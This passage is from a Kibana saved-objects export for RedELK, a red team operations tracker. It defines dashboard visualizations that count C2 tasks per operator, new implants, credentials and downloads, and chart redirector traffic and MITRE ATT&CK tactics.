"{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":14,\"maxFontSize\":58,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Techniques tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 164], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per C2 operator", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Tasks launched\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Unknown user\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Tasks launched\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Tasks launched\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Tasks launched per operator\"}"}, "coreMigrationVersion": "7.16.3", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 166], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Hosts total unique count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"2\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"host.name\",\"customLabel\":\"Hosts\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Hosts total unique count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 168], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - CS - Downloads total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 170], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic over time\",\"type\":\"line\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_customer\\\"\",\"language\":\"kuery\"},\"label\":\"C2 traffic - Customer\"},{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Red team tests\"},{\"input\":{\"query\":\"redir.backend.name : c2* and not tags: \\\"iplist_customer\\\" and not tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Other\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"group\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"date_histogram\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}},\"schema\":\"segment\"}],\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"line\",\"mode\":\"normal\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"interpolate\":\"linear\",\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"}}"}, "coreMigrationVersion": "7.16.3", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 172], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic source table", "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic source table\",\"type\":\"table\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"Hits\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Source IP\"},\"schema\":\"bucket\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.as.organization.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"AS Organisation\"},\"schema\":\"bucket\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.geo.country_iso_code\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Country\"},\"schema\":\"bucket\"}],\"params\":{\"perPage\":10,\"showPartialRows\":true,\"showMetricsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":true,\"totalFunc\":\"sum\",\"percentageCol\":\"Hits\",\"showToolbar\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 174], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks execution timeframe", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"min\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"First task\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"max\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"Last task\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":24}}},\"title\":\"RedELK - Tasks execution timeframe\"}"}, "coreMigrationVersion": "7.16.3", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 176], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Target host and user selector", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1595867425052\",\"fieldName\":\"host.name\",\"parent\":\"\",\"label\":\"Target host(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1595867451919\",\"fieldName\":\"user.name\",\"parent\":\"\",\"label\":\"Target user(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":false,\"pinFilters\":false},\"title\":\"RedELK - Target host and user selector\"}"}, "coreMigrationVersion": "7.16.3", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "rtops", "name": "control_1_index_pattern", "type": "index-pattern"}], "sort": [1642171875895, 179], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic per backend", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic per backend\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"C2 traffic\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"segment\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"redir.backend.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Backend\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 181], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Credentials total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 183], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: implant_newimplant\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - New implants over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"New implants over time\",\"type\":\"line\",\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":true,\"style\":{\"color\":\"#eee\"},\"valueAxis\":null},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100,\"rotate\":0,\"filter\":true},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":\"true\",\"type\":\"line\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"interpolate\":\"linear\",\"lineWidth\":5,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1,\"extended_bounds\":{}}}]}"}, "coreMigrationVersion": "7.16.3", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 185], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic All", "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Blues\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.3", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 187], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.3", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 190], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 192], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": 